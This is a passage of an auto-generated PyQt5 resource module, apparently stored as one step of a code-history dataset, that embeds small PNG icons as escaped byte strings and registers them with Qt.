\\xceH\\x90\\x0b\\x00\\x00\\x00\\x18tEXtThumb::Document::Pages\\x001\\xa7\\xff\\xbb/\\x00\\x00\\x00\\x18tEXtThumb::Image::Height\\x00587.%\\x1cG\\x00\\x00\\x00\\x17tEXtThumb::Image::Width\\x00587\\xbd\\xd4L\\x1a\\x00\\x00\\x00\\x19tEXtThumb::Mimetype\\x00image/png?\\xb2VN\\x00\\x00\\x00\\x17tEXtThumb::MTime\\x001588382935\\x93\\xf3{S\\x00\\x00\\x00\\x12tEXtThumb::Size\\x0032762BPG\\x06\\xdb\\x00\\x00\\x00ZtEXtThumb::URI\\x00file:///data/wwwroot/www.easyicon.net/cdn-img.easyicon.cn/files/125/1257328.png\\xf9g\\xb6\\x19\\x00\\x00\\x00\\x00IEND\\xaeB`\\x82\\x00\\x00\\x07\\xd2\\x89PNG\\r\\n\\x1a\\n\\x00\\x00\\x00\\rIHDR\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x18\\x08\\x06\\x00\\x00\\x00\\xe0w=\\xf8\\x00\\x00\\x00\\x04gAMA\\x00\\x00\\xb1\\x8f\\x0b\\xfca\\x05\\x00\\x00\\x00 cHRM\\x00\\x00z&\\x00\\x00\\x80\\x84\\x00\\x00\\xfa\\x00\\x00\\x00\\x80\\xe8\\x00\\x00u0\\x00\\x00\\xea`\\x00\\x00:\\x98\\x00\\x00\\x17p\\x9c\\xbaQ<\\x00\\x00\\x00\\x06bKGD\\x00\\xff\\x00\\xff\\x00\\xff\\xa0\\xbd\\xa7\\x93\\x00\\x00\\x00\\tpHYs\\x00\\x00\\r\\xd7\\x00\\x00\\r\\xd7\\x01B(\\x9bx\\x00\\x00\\x00\\x07tIME\\x07\\xe4\\t\\x19\\x0804\\x91\\xe1\\x1a\\xae\\x00\\x00\\x05]IDATH\\xc7\\xdd\\x95M\\x88\\x9dW\\x19\\xc7\\x7f\\xef\\xf7}\\xe7\\xde\\xb93\\x99\\xef\\xc9$M\\x1a\\xd3N\\x1d\\x9bYD\\x0c\\xba\\xb0h\\xa0v\\x157\\x8a\\xb80ED\\x10\\xf1\\x03\\\\\\x99M\\x11\\x04\\x17\\x82\\x0b\\x91Z\\xe8\\xca\\x8d\\x90\\xd2\\x9d\\x8a\"\\xb8\\xb2\\xa2B[\\xd2&\\xd1&i\\x12\\x93L\\xe6\\xde\\x99\\xb93s\\xe7~\\xbf\\xf7}\\xcf9\\xcf\\xe3\\xe2\\xdeI\\x8dXq\\xed\\x03\\x7f\\xce\\xe1,\\xce\\xef\\xf9?\\xcfs8\\x1e\\x1f\\x12/\\x7f\\xeb\\x02\\xf1\\xecql\\xb7Iif\\x99\"\\x9c`\\xd0\\xef\\x91\\xed\\xd7\\xf1\\x87\\x1d\\xdez\\xd0\\xe2\\xfc3\\x0b|\\xfb\\x95\\xdf\\xf0\\xdf\"\\xf8O\\x87?\\xff\\xee\\x17\\x90\\xce\\x0e\\xd3\\xab\\x9fd>6\\x95\\x81\\x84\\x9f\\xe8u\\xbb\\xe7\\x8b\\xacw\\xd6\\x137\\x9dR\\xb4\\xfb\\x1a\\x0f\\xe7\\x13\\xcb\\xf9\\xb3O\\xf3\\x87+w>\\x14\\xe0\\xbdr\\xf9u\\xa6\\xaaU\\x96fg\\xa9\\xa4)\\xbe\\xef\\xd3\\xdb\\xba\\xcf\\x9d\\x95\\x17(\\xfd\\xee\\xa5\\xcf\\xde\\xdfn^\\xda\\xddo~\\\\U\\x13\\x0f<g\\x8d\\xf1\\xd5\\xfd-%\\xff\\xc9\\x8f\\xcf\\xd5\\x7f\\xfd\\xdb\\x13?\\xd0x\\xf6\\x18Y\\x96\\xd1\\xedv\\xd9\\xdfo\\xb2Y\\xabq\\xfb\\xf6\\x1d\\xb6\\xb7\\xea\\x84\\x9e\\xe7ya\\x10DI\\x14\\xf9\\xe54\\xf5\\xe3(\\xf2g\\xd6\\xce\\xb2\\xf9\\xfa\\x0f\\x9f\\xbf~\\xb7\\xf6\\xf2 \\xcf\\xcb\\x9f:\\xff\\xc2p\\xe5\\xe4\\xe9\\xe0\\xc1\\x83\\x87\\xfe\\xb5+o\\xe9\\xee\\x83\\xdbg;\\xd6\\xfd\\xe2{\\x7f]\\xbe\\xf4\\x95\\xf3k\\xbf\\xea\\r2\\xf2<\\x17@DEDDU\\xd5\\x01}\\xef\\xa7\\xbf|\\xed\\xa4\\xc0\\x8f\\x82 XL\\xe3$\\xf4}/\\xf2\\x86\\xfdp\\xf3\\xca\\x9fO\\x1dt\\xbbs_\\xfc\\xea7\\xf3\\xd5\\xd5\\xd5\\xa4\\xdd\\xe9\\xf2\\xc6\\x9f\\xfe\\xc2\\xb5\\xbf\\xdf\\xa0\\xdbi\\xd9A\\xedV\\xe8\\x99\\xac7\\xf5\\xc4G\\xeb-\\xe3\\xbb|\\x98K^\\xe4\\xae\\xc8s\\xc9\\xf3B\\xf2<\\xaf[S|\\'\\x0c\\xc3`2+\\xcc\\xf3\\x85\\xb1\\xf3Y6\\xc49\\xc1ooS\\xaf\\xd7\\xf8\\xf4\\xe7\\xbf\\xc4\\xfa\\xb3\\xcf&\\x9e\\x07mU\\xaa\\xd5\\ns3G\\xf0\\x83 \\xcc\\xbaK\\xf46\\xde\\xab\\xec\\xdf\\xb8\\xfet\\x93IT\\x05TQU\\x00Tu\\t\\x95R\\x98&\\t\\xb9q\\xd6\\x88\\xc5Y\\x87\\x88EZ{\\x04I\\xca\\xd2\\xb1\\x13tz}\\xac\\xb38\\x11\\xd2R\\x89\\xead\\x85\\xbc((MN\\xd3\\xf1#\\xc83\\x82\\xb8\\x8c\\x11\\x1d\\x03\\xe4\\x10\\xe0P%4\\x85Q\\x15\\xc1Z\\x8b8A\\xac\\xc5d\\x19~\\x10\\xb2w\\xd0\\xe6\\xee\\xc6C\\x92(\"\\n\\x03\\xc49\\xc20\\xc0\\xf7=\\x02\\xdf\\xc7)8k \\x12T\\x14\\x18\\x03\\x14\\x14\\x05\\x15\\xc2A\\x96!\\xa2\\xe3\\xec\\x05g\\x1d\\x8aG1\\x1c\\xb0\\xf1p\\x93a^P\\x99H\\x99H\\x12\\x0eZm\\xb2l\\x88)\\n\\xac)(\\x86}\\xc0\\xc3\\x89\\xa0\\x87\\xe5QAG\\x16F\\x80~\\x96\\x11\\x04\\x11\\xceZT\\x15\\xe3\\x04\\xa2\\x14\\xc9\\x0746\\xee\\x12\\x97&(\\x8a\\x82,\\x8ei\\xec\\xed\\xd1j\\xb5\\xc9\\x869\\xed\\xdd:\\xc3^\\x87dj\\x0ek\\x05\\xe5\\x10p\\xd8\\x87\\xd1>\\xcc\\xb2!I\\x02\\xce9T\\x15g-R\\xaa\\x12\\xa5e\\x1a\\xb7\\xae\\x82\\x1f2\\xbbr\\x824Ih\\xec\\xee\\x8df}{\\x93\\xbd{7H\\xfc\\x90\\\\\\x13\\xac8\\xfcQ\\xdd\\xc7\\xa5\\xf9\\x17@Q\\x18<?\\xc0Z\\x87\\x8a\\xe0\\xac\\xc5\\x12\\x12.\\x9c\\x84\\xeeu\\xee\\xbf\\xfdGv\\xee-\\x92Vgi\\xee6\\xe86\\x1b\\xf4\\x9b;\\x94\\xf1\\xf8\\xccb\\x99[}\\xc3\\xbd\\xb0J\\xd3\\xf4\\x1f\\xcb^U\\xf1PBc\\x0cA\\x10\\x8c2\\x17\\xc5Z\\x87s\\x0e\\x1bMR9u\\x06}x\\x9b\\xf6\\xd6\\x06;\\xff\\xb8\\x895\\x16Q!*MP\\x89\\'\\xa8\\x86\\xc2z\\xf54\\x13\\xfd\\x9c\\x1b14\\xb2\\xce\\xa3\\xcc\\x0f\\xfb\\x10Zk\\xb1\\xc6b\\x9dC\\x9c\\xe0\\xdc\\x08 \\xcea\\xfd\\x94\\xe0\\xe83\\x1c\\x99=\\x8e\\x1b\\xf6\\x11Q\\x0e\\x0e\\x0e\\xd8\\xda\\xd9\\xe5\\xc0xL\\xf5\\x16XMS>2YF\\xdb\\x82\\xc4\\x8e\\xc6p\\x0c\\x19\\r+\\xa1s\\x0e\\xeb\\x1c\\xceZ\\x9c\\x93\\xb1\\x93\\xf14\\xe9\\xc8\\x91%B\\xa2*\"\\xc2\\xc0\\xb51\\xd6\\x81\\x07\\xef\\x99&\\xa1\\xe7\\xf3\\x84_\\xe6X\\\\AsAKJ#k\\x8f](\\xa1\\xb3\\x0e\\x17\\xd8\\x0f\\xc6\\xd4\\t\"\\x0e\\xeb\\xec\\xbf9\\x921\\xd8\\xa2*xx\\xb4\\xf3\\x1e\\xef\\x8a\\x83d\\x91\\xa3\\x12\\xb3\\xa0\\tJ\\x15-\\t\\x8d\\xac\\xed!\\x82/\\xceyn$\\x8c\\xb18g\\xc7\\xcd\\x1e\\xbb\\xb2n$7Z\\xc5\\xb9\\x0f^\\xacB;\\xef\\xf3\\xcep\\x8b\\xba_ N8R\\xf8\\xacj\\x95\\xc90\\xd1\\xcc\\xe4\\x9eo\\x8a\\xc2\\x16y\\xd16\\x85y\\xfcB\\xebF\\r\\xb7\\xf6\\xd1\\xe5\\xce\\x8d\\\\\\x1e>*U\\xc1\\xf3\\xa0=\\xec\\xf1\\xcep\\x8b\\x9d\\xd8\\xe1\\xfb\\xb0Z\\xda\\xeb-\\x98\\x9dW7\\xb6[\\xb5po\\xabvW\\x94\\x17\\x81sa\\x14\\xaf\\x07a\\xb4\\xe6\\x07\\xe1IU\\xe6\\x14\\x12\\x15yT\\xba\\xc3\\xbd\\xa2x\\x80\\xaa\\xa0\\x825E\\xde\\xa8u\\xda7\\x8b\\xb8{\\xedsK\\xcb\\xd1\\xf2t\\xfd\\xed\\xa7\\x1a\\xf7.\\xbfv\\xf1\\xb9<L\\xcb\\xe5b~\\xf9\\xd8\\x9b_\\xfb\\xfeKo\\x9e\\x9b\\xf2\\xc2\\x99\\xf9\\xc5\\xe9\\x85\\x95\\xe3+\\xe5\\xc9\\xa9\\xd5\\xb8\\x94\\x9e\\x89\\xe2\\xe4L\\x10DO\\xf9A\\xb0\\xec\\xfbAUU\\x02gmnM\\xb1\\x93\\xf5\\xfb\\xef\\x0f\\x07\\xfdw\\x07\\xbd\\xee\\xd5\"\\xcfo\\xd5a\\xf3\\xea\\xfbW\\x9b\\xaa\\x97\\xf3\\x9b\\xcf}\\x9d/\\xff\\xec\\r\\xbc\\xc7\\xbe7\\xcfca\\xe58\\xa7\\xd7\\xd6\\xb9p\\xf1\\x1b\\\\\\xbax\\xc1\\x07*3\\xf3K\\x0b\\xd5#\\xb3\\xa7\\xca\\xd5\\xa9\\xb5<\\xeb/\\xed\\xed\\xd4j\\xfdv\\xe7\\xbe1E\\x03h\\x01\\x9d\\xb1\\xb2\\xf5\\xa3s\\xd2\\xec\\xb5\\xd8\\xecX\\xfe\\xa7\\x08\\xa3\\x88\\'W?\\xc6\\xab\\xbf\\xbf\\x02\\xe0\\x03\\xd1X\\xf1X\\xe1\\xf8\\xfc\\xff4\\xfe\\tP\\xc9\\xce\\x14aj\\x10F\\x00\\x00\\x00%tEXtdate:create\\x002020-07-19T03:39:19+00:00\\x9dpLl\\x00\\x00\\x00%tEXtdate:modify\\x002019-01-08T17:54:06+00:00\\xfa\\xaed\\x88\\x00\\x00\\x00 tEXtsoftware\\x00https://imagemagick.org\\xbc\\xcf\\x1d\\x9d\\x00\\x00\\x00\\x18tEXtThumb::Document::Pages\\x001\\xa7\\xff\\xbb/\\x00\\x00\\x00\\x18tEXtThumb::Image::Height\\x00512\\x8f\\x8dS\\x81\\x00\\x00\\x00\\x17tEXtThumb::Image::Width\\x00512\\x1c|\\x03\\xdc\\x00\\x00\\x00\\x19tEXtThumb::Mimetype\\x00image/png?\\xb2VN\\x00\\x00\\x00\\x17tEXtThumb::MTime\\x001546970046\\xc48\\x95\\x8f\\x00\\x00\\x00\\x13tEXtThumb::Size\\x00152098B\\xe5\\x15\\x0c\\xcb\\x00\\x00\\x00ZtEXtThumb::URI\\x00file:///data/wwwroot/www.easyicon.net/cdn-img.easyicon.cn/files/106/1066238.png9:*\\r\\x00\\x00\\x00\\x00IEND\\xaeB`\\x82'\n )\nqt_resource_name = (\n b'\\x00\\x03\\x00\\x00wG\\x00p\\x00n\\x00g\\x00\\x04\\x00\\x06\\xfa^\\x00i\\x00c\\x00o\\x00n\\x00\\x0b\\x05\\xff\\xda\\x07\\x001\\x001\\x003\\x007\\x002\\x006\\x004\\x00.\\x00p\\x00n\\x00g\\x00\\x0e\\x02\\xd3\\xb9\\x87\\x00d\\x00e\\x00a\\x00l\\x00 \\x00s\\x00m\\x00a\\x00l\\x00l\\x00.\\x00p\\x00n\\x00g\\x00\\x07\\t\\xc7W\\xa7\\x00s\\x00e\\x00t\\x00.\\x00p\\x00n\\x00g\\x00\\x0b\\x0f)N\\xc7\\x00p\\x00r\\x00e\\x00v\\x00i\\x00e\\x00w\\x00.\\x00p\\x00n\\x00g'\n )\nqt_resource_struct_v1 = (\n b'\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x0c\\x00\\x02\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x03\\x00\\x00\\x006\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x01\\xe2\\x00\\x00\\x00\\x1a\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00X\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x05\\x91\\x00\\x00\\x00l\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x0c\\xbc'\n )\nqt_resource_struct_v2 = (\n b'\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0c\\x00\\x02\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x006\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x01\\xe2\\x00\\x00\\x01tV\\xe3?\\xc3\\x00\\x00\\x00\\x1a\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x01h.\\xd5\\xff8\\x00\\x00\\x00X\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x05\\x91\\x00\\x00\\x01t\\xc4s:\\x8f\\x00\\x00\\x00l\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x0c\\xbc\\x00\\x00\\x01t\\xc4s\\xadC'\n )\nqt_version = [int(v) for v in QtCore.qVersion().split('.')]\nif qt_version < [5, 8, 0]:\n rcc_version = 1\n qt_resource_struct = qt_resource_struct_v1\nelse:\n rcc_version = 2\n qt_resource_struct = qt_resource_struct_v2\n\n\ndef qInitResources():\n QtCore.qRegisterResourceData(rcc_version, qt_resource_struct,\n qt_resource_name, qt_resource_data)\n\n\ndef qCleanupResources():\n QtCore.qUnregisterResourceData(rcc_version, qt_resource_struct,\n qt_resource_name, qt_resource_data)\n\n\nqInitResources()\n",
"step-4": "from PyQt5 import QtCore\nqt_resource_data = (\n b'\\x00\\x00\\x01\\xde\\x89PNG\\r\\n\\x1a\\n\\x00\\x00\\x00\\rIHDR\\x00\\x00\\x00(\\x00\\x00\\x00(\\x08\\x06\\x00\\x00\\x00\\x8c\\xfe\\xb8m\\x00\\x00\\x01\\xa5IDATx\\x9c\\xed\\xd8?k\\x14A\\x1c\\x87\\xf1OB,\\x8dE\\x88X\\x0b\"$ \\xa4\\xb0I\\xa3(\\x8a\\x08\\xfei$M\\xf0\\xcc\\xebJaR\\xa8/\\xc1\\xca\" 6\\x82XYX\\x08*h\\xa2D\\xc54\\x81\\xa8\\x9bb8\\x18\\xe6vo/\\x97\\x9d5\\x1c\\xfb\\xc0\\xc0\\xdd\\xcc\\xee\\xcd\\xb3\\xbf\\xd9\\xfd\\xde\\xdc\\xd1\\xd1q2\\xb8\\x8f\\xef(\\x8e\\xd8\\xbe\\xe2V\\x1b\\x82\\xdb\\xb8<\\xc6y7\\xf0\\xbea\\x97R\\x8a1\\xcf;\\x83_M\\x8a\\xa4L\\xe7\\xfc\\xf0&\\x98x\\xc1}\\xfcs\\xf4\\x87+n\\xdfp\\xb7n\\xa2q\\xef\\xc1&X\\xc6\\xa7\\xba\\x83\\xfe\\xa7\\xe0\\xd0\\xf9\\'\\xfe\\x1e\\xcc\\xceD\\x08\\xae\\na|\\x9c\\'\\xb5\\xae\\x89^\\x1f`=\\x95\\xa8\\xbaIg\\xf1\\x03\\x0b#\\\\HS\\x9c\\xc3\\xef\\xfe\\x9b\\xba\\n\\xae\\xe0\\x05\\xde\\xe54J\\xb8\\x87\\xe7igU\\x05_\\xe2NV\\x9dA^\\xe1v\\xdaY&xA\\xd8N\\xcd\\xe46\\x8a\\xb8\\x88/\\xf1\\x9c\\xc3\\x96\\xf8!\\x9e\\xe2Of\\xa9\\x98\\x1e\\x9e\\x94\\xcd\\x99Vp\\x1a\\x1fq\\xa9\\x05\\xa9x\\xce\\xcfX,\\x1bL\\x05\\xaf\\xe1Mn\\xa3\\x84\\x9bx\\x9dvV-\\xf1\\x1a\\x1eg\\xd5\\x19\\xa4\\x87\\x8d\\xaa\\xc1\\xb8\\x82\\xa7\\x85\\xec\\x9b\\xcf,\\x143\\x8b\\x9f\\x98K\\x07\\xca*\\xf8\\x00[\\xc2\\x8f\\xa8\\xb6\\xe8\\xe7\\xedn\\xd5\\x01q\\x05\\xb7\\x84\\xb0l\\x93\\xda\\xbc\\xed\\x0b\\x9e\\xc7\\x0eN\\xe56\\x8a\\x18\\x9a\\xb7\\xe9\\x12\\xf7\\xf0L\\xf8\\xc2n\\x8b\\x91\\xf2\\xb6\\xc0\\x14>`\\xa9\\x05\\xa9>#\\xe7m\\x81\\xabx\\x9bY(\\xe5\\xba\\x9a\\xbc\\x8d\\x97\\xb8\\x87\\xcd\\xac:\\x83<2b\\xde\\x16B\\xf6\\x9d\\xcdi\\x131%\\xfc\\xa7\\xb3\\xa3$\\xfb\\xca\\xd8\\x93w\\xc7\\x9c\\xb6\\xbf\\xc2\\x1e\\xf3\\xca1/\\xb4\\xa3\\xa3\\xe3\\xc4s\\x08(\\x98\\x98$\\xc8\\xdd\\xa5@\\x00\\x00\\x00\\x00IEND\\xaeB`\\x82\\x00\\x00\\x03\\xab\\x89PNG\\r\\n\\x1a\\n\\x00\\x00\\x00\\rIHDR\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x03\\x00\\x00\\x00(-\\x0fS\\x00\\x00\\x00\\x04gAMA\\x00\\x00\\xb1\\x8f\\x0b\\xfca\\x05\\x00\\x00\\x00 cHRM\\x00\\x00z&\\x00\\x00\\x80\\x84\\x00\\x00\\xfa\\x00\\x00\\x00\\x80\\xe8\\x00\\x00u0\\x00\\x00\\xea`\\x00\\x00:\\x98\\x00\\x00\\x17p\\x9c\\xbaQ<\\x00\\x00\\x00\\x84PLTE279\\x00\\x00\\x00279279279279279279279279279279279279279279279279279279279279279279279279279279279279279279279279279279279279279279279279279\\xff\\xff\\xff\\xeb}\\xd90\\x00\\x00\\x00*tRNS\\x00\\x00,\\xcf\\xb7\\x01\\x18 \\x1f\\x1c\\x15\\xbdx\\xc3\\xc1w\\'1\\x95\\xbe-\\xdfP\"\\x1e\\xca\\xdc$\\xc2(&2\\x1d\\x11\\xb9M\\xf4\\x12\\xdeO\\x88\\xe0\\xc4\\x83\\x03\\xa2\\x00\\x00\\x00\\x01bKGD+$\\xb9\\xe4\\x08\\x00\\x00\\x00\\x07tIME\\x07\\xe4\\t\\x04\\x02\\x0c,^\\x9a\\xf1\\x93\\x00\\x00\\x00\\x89IDAT\\x18\\xd3U\\xcf\\xd9\\x12\\x820\\x10D\\xd1\\x8e\\x18\\x88\\xc8\\xb0\\xb8\\x05\\x01AAA\\xf3\\xff\\x1fh6\\x04\\xef[\\x9f\\xaa\\xa9J\\x80u\\x9b`\\x0b\\x1eF\\xc2\\x16\\xedx\\xbcW\\x01\\x12J]\\x94\\xe5\\xc5\\xe1x\\xc2\\xf9\"\\xa4\\xad,\\xe8Z\\xc4@%\\xfc}\\xdd(\\xbaq\\r\\x12\\x8c\\xe9\\xdd6\\xaa\\xe9\\xb2\\xbb\\x03\\xb7\\xa9.)\\x9a\\xc1\\xec\\x162\\x9d\\xe1\\xd1\\x9b\\xbd\\x82\\xe1\\xd9\\xeb\\xbd\\x82|x\\xe1\\x0fll\\x01\\x9f\\x07\\xb1\\xfcM\\x18\\x18\\'\\xfft)\\xc5D!\\xf0\\x1e\\xab_\\x9f\\x84\\xe3\\x0bP\\xe9\\x0c\\xb4\\xd8u\\xd4\\x0e\\x00\\x00\\x00%tEXtdate:create\\x002020-07-19T03:39:20+00:00\\x86g\\x0e\\\\\\x00\\x00\\x00%tEXtdate:modify\\x002019-01-08T19:49:46+00:00\\xb0r2\\xb2\\x00\\x00\\x00 tEXtsoftware\\x00https://imagemagick.org\\xbc\\xcf\\x1d\\x9d\\x00\\x00\\x00\\x18tEXtThumb::Document::Pages\\x001\\xa7\\xff\\xbb/\\x00\\x00\\x00\\x19tEXtThumb::Image::Height\\x001068\\x8a\\xfcQ\\x92\\x00\\x00\\x00\\x18tEXtThumb::Image::Width\\x001068\\x9f\\xb5\\x8d\\x8b\\x00\\x00\\x00\\x19tEXtThumb::Mimetype\\x00image/png?\\xb2VN\\x00\\x00\\x00\\x17tEXtThumb::MTime\\x001546976986B7\\xbe\\xd0\\x00\\x00\\x00\\x12tEXtThumb::Size\\x0018237B\\x1b]y\\xed\\x00\\x00\\x00ZtEXtThumb::URI\\x00file:///data/wwwroot/www.easyicon.net/cdn-img.easyicon.cn/files/119/1190710.pngZ\\xd1vK\\x00\\x00\\x00\\x00IEND\\xaeB`\\x82\\x00\\x00\\x07\\'\\x89PNG\\r\\n\\x1a\\n\\x00\\x00\\x00\\rIHDR\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x18\\x08\\x03\\x00\\x00\\x00\\xd7\\xa9\\xcd\\xca\\x00\\x00\\x00\\x04gAMA\\x00\\x00\\xb1\\x8f\\x0b\\xfca\\x05\\x00\\x00\\x00 cHRM\\x00\\x00z&\\x00\\x00\\x80\\x84\\x00\\x00\\xfa\\x00\\x00\\x00\\x80\\xe8\\x00\\x00u0\\x00\\x00\\xea`\\x00\\x00:\\x98\\x00\\x00\\x17p\\x9c\\xbaQ<\\x00\\x00\\x02\\x01PLTE\\x00\\x00\\x00\\xae\\xad\\xb3\\x8c\\x89\\x93\\x8b\\x88\\x92\\x88\\x84\\x8f\\x8d\\x8a\\x94\\x85\\x81\\x8c\\x85\\x82\\x8c\\x8a\\x87\\x91\\x8c\\x89\\x92\\xab\\xaa\\xb0\\x8f\\x8c\\x96\\x8e\\x8b\\x95\\x8e\\x8b\\x94\\x90\\x8e\\x97\\x8b\\x87\\x92\\x9a\\x98\\xa1\\x98\\x96\\x9e\\x8e\\x8c\\x95\\x86\\x83\\x8e\\xae\\xad\\xb3\\xae\\xad\\xb3\\xaa\\xa9\\xaf\\x90\\x8d\\x97\\x8b\\x88\\x92\\x8c\\x89\\x93\\xae\\xad\\xb3\\xae\\xad\\xb3\\xaa\\xa9\\xaf\\x90\\x8d\\x96\\x8b\\x88\\x92\\x8b\\x89\\x92\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8b\\x88\\x92\\x8d\\x8a\\x93\\x8c\\x89\\x93\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8b\\x88\\x92\\x93\\x91\\x9a\\x8c\\x89\\x93\\x8b\\x88\\x92\\x8b\\x89\\x92\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8b\\x88\\x92\\x8b\\x88\\x92\\x8b\\x88\\x92\\x8b\\x88\\x92\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8b\\x88\\x92\\x8c\\x89\\x93\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8b\\x88\\x92\\x8c\\x89\\x93\\xae\\xad\\xb3\\xaa\\xa9\\xaf\\x8f\\x8d\\x96\\x8b\\x88\\x92\\x8c\\x89\\x93\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xab\\xaa\\xb0\\x8f\\x8c\\x96\\x8b\\x88\\x92\\x8b\\x88\\x92\\x8f\\x8c\\x96\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8c\\x89\\x93\\x8b\\x88\\x92\\x8b\\x88\\x92\\x8b\\x88\\x92\\x8c\\x89\\x93\\x8c\\x89\\x93\\x8c\\x89\\x93\\xae\\xad\\xb3\\x8b\\x88\\x92\\x8b\\x88\\x92\\x8b\\x88\\x92\\x8b\\x88\\x92\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8c\\x89\\x93\\x8b\\x88\\x92\\x8b\\x88\\x92\\x8b\\x88\\x92\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8c\\x89\\x93\\x8b\\x88\\x92\\x8b\\x88\\x92\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8b\\x88\\x92\\x8b\\x88\\x92\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8c\\x89\\x93\\x8b\\x88\\x92\\x8b\\x88\\x92\\x8b\\x88\\x92\\x8b\\x88\\x92\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xab\\xaa\\xb0\\x8f\\x8c\\x96\\x8b\\x88\\x92\\x8e\\x8c\\x95\\xae\\xad\\xb3\\xaa\\xa9\\xaf\\x8f\\x8d\\x96\\x8b\\x88\\x92\\x8c\\x89\\x93\\xae\\xad\\xb3\\x8b\\x88\\x92\\x8c\\x8a\\x93\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8b\\x88\\x92\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8b\\x88\\x92\\x8b\\x88\\x92\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8b\\x88\\x92\\x8f\\x8c\\x95\\x8c\\x89\\x93\\x8b\\x88\\x92\\x8b\\x88\\x92\\xae\\xad\\xb3\\xae\\xad\\xb3\\x8b\\x89\\x92\\x8c\\x89\\x93\\x8c\\x89\\x93\\xae\\xad\\xb3\\x90\\x8d\\x96\\x8b\\x88\\x92\\xaa\\xa9\\xaf\\x90\\x8d\\x96\\x8b\\x88\\x92\\xae\\xad\\xb3\\x00\\x00\\x00\\xb1\\xc2u\\x92\\x00\\x00\\x00\\xa6tRNS\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x13\\x15\\x15\\x14\\x06*\\xc2\\xcf\\xcf\\xceI\\x18\\x14E\\xfbo\\x07\\x14#\\xbc\\xb9+k\\xfe\\x91\\x02\\x12\\xbf*\\xbe\\xd5\\xa9\\xe8\\xee\\xa7\\xb8\\xc7\\x11\\xb8\\xc6\\x1e\\x08\\x94\\xc0\\x19\\xba\\xf4\\xf4\\xdb1\\xa1\\xdfy=<u\\xb5\\x03\\x05Ae\\x86\\xeb=6\\xd9\\xedqG+\\x04\\xcan\\xfb\\xc3\\x13\\xce\\xf44\\xf0\\xd0\\x15\\xcf;3\\xef\\xcf\\xc5\\xfdti\\xfe\\x040N\\xea\\xdb5/\\xd5\\xf2\\x96K\\xab\\xd9m33\\xb1\\x05%\\xf0\\xef\\xc1\\x17\\xb1\\x9a\\n\\x1a\\xc3\\xc8)\\xc6\\xc4\\xad\\xef\\xb7\\xd7\\xc1\\x9f\\x02\\x8a|\\x04,\\xba\\xcc\\x17\\x0bQ\\x16!\\xcc\\x15\\x04\\r\\xb7\\x9c\\xe1\\x00\\x00\\x00\\x01bKGD\\x00\\x88\\x05\\x1dH\\x00\\x00\\x00\\tpHYs\\x00\\x00\\x00d\\x00\\x00\\x00d\\x00\\x0f\\x96\\xc5\\xdd\\x00\\x00\\x00\\x07tIME\\x07\\xe4\\t\\x19\\x080\\x1eJZ\\xd3x\\x00\\x00\\x01\\x8aIDAT(\\xcfc`\\x80\\x02F\\x11Q1q\\tI&\\x06$\\xc0\\x08\\x06R\\xd22\\xb2r\\xf2\\xccLLL,\\xacpq\\x05EFF%\\xe5e\\xcbW\\xa803\\xa9\\xaa1\\xb3\\xb1B\\xc5\\xd554\\xb5\\x18\\xb5u\\x80\\x12\\xbaz\\xfa\\xba\\x06\\x86\\xcc\\xec\\xac`\\tu\\xa3\\x95+\\x8dMLW\\x02%\\xcc\\xcc-V\\xac\\xb04d\\xe6\\x00IXY\\xaf\\x84\\x00\\xa0\\x04\\x04\\xd8\\xd8r\\x82$\\xec\\xec\\xd1%\\x1c\\x1c\\x99\\xc0F):A$\\x9c] 